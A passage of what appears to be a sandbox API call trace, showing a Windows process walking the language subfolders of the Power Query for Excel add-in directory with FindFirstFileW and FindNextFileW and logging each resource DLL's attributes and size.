ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0047.650] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hr\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71a00 [0047.651] FindNextFileW (in: hFindFile=0xf71a00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.651] FindNextFileW (in: hFindFile=0xf71a00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.651] FindNextFileW (in: hFindFile=0xf71a00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x95505c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x95505c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a13a8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.651] FindNextFileW (in: hFindFile=0xf71a00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b61d36, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.651] FindNextFileW (in: hFindFile=0xf71a00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17ef5ba, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17ef5ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.651] FindNextFileW (in: hFindFile=0xf71a00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17ef5ba, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17ef5ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0047.651] FindClose (in: hFindFile=0xf71a00 | out: hFindFile=0xf71a00) returned 1 [0047.652] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.652] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ebbef3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ebbef3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0047.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hu\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ebbef3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ebbef3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71b40 [0047.654] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ebbef3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ebbef3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.654] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf75a8fbb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf75a8fbb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf75a8fbb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.654] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2ebbef3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2ebbef3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ebbef3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.655] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1945af2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1945af2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.655] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2d943c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2d943c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2ff666, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x92aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.655] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2d943c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2d943c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2ff666, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x92aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0047.655] FindClose (in: hFindFile=0xf71b40 | out: hFindFile=0xf71b40) returned 1 [0047.655] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.655] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0047.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\id\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71c80 [0047.657] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.657] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff0bc27, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xdaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.658] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x25aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.658] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d9d08d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d9d08d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf755cb7d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x31040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.658] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc43098a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.658] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc43098a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 0 [0047.658] FindClose (in: hFindFile=0xf71c80 | out: hFindFile=0xf71c80) returned 1 [0047.658] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.658] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6270fd0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6270fd0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0047.659] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\it\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6270fd0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6270fd0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf720c0 [0047.661] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6270fd0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6270fd0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.661] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc240ad7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc240ad7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.661] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5fc257f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5fc257f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6034d6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.661] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6270fd0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6270fd0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6270fd0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.661] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa89f599, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae22cc9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8caa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.661] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa89f599, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae22cc9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8caa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0047.661] FindClose (in: hFindFile=0xf720c0 | out: hFindFile=0xf720c0) returned 1 [0047.662] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.662] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91adba5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0047.662] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ja\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91adba5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf720c0 [0047.663] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91adba5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.663] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6d05722, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d05722, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.663] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x91adba5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91d3da7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.663] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf12dd5ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1329a43, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x36aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.663] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbda21cf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbda21cf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbda21cf, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x94aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.663] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbda21cf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbda21cf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbda21cf, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x94aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0047.663] FindClose (in: hFindFile=0xf720c0 | out: hFindFile=0xf720c0) returned 1 [0047.664] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.664] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d2b978, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kk", cAlternateFileName="")) returned 1 [0047.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\kk\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d2b978, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71ec0 [0047.666] FindNextFileW (in: hFindFile=0xf71ec0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d2b978, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.666] FindNextFileW (in: hFindFile=0xf71ec0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd2face, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd2face, ftLastAccessTime.dwHighDateTime=0x1d327e7, 